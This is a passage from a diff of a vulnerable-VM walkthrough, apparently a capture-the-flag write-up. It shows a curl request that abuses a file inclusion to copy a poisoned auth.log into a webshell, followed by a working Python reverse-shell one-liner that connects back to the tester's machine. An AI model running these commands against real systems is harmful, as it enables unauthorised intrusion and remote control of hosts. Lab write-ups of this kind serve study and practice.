ofasgard/VulnVMWriteUps/writeups/EvilScience.md

 `curl "http://192.168.56.101/index.php?file=/var/log/auth.log&a=cp+/var/log/auth.log+shell.php"`

 This gave me a permanent copy of auth.log in the local directory that won't be overwritten when the log rolls over.
-The second issue, the messy and slow nature of the webshell, was solved by creating a reverse shell to my machine.
+That gave me time to solve the messy and slow nature of the webshell by creating a reverse shell to my machine.
 The code I used is as follows:

 ```
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'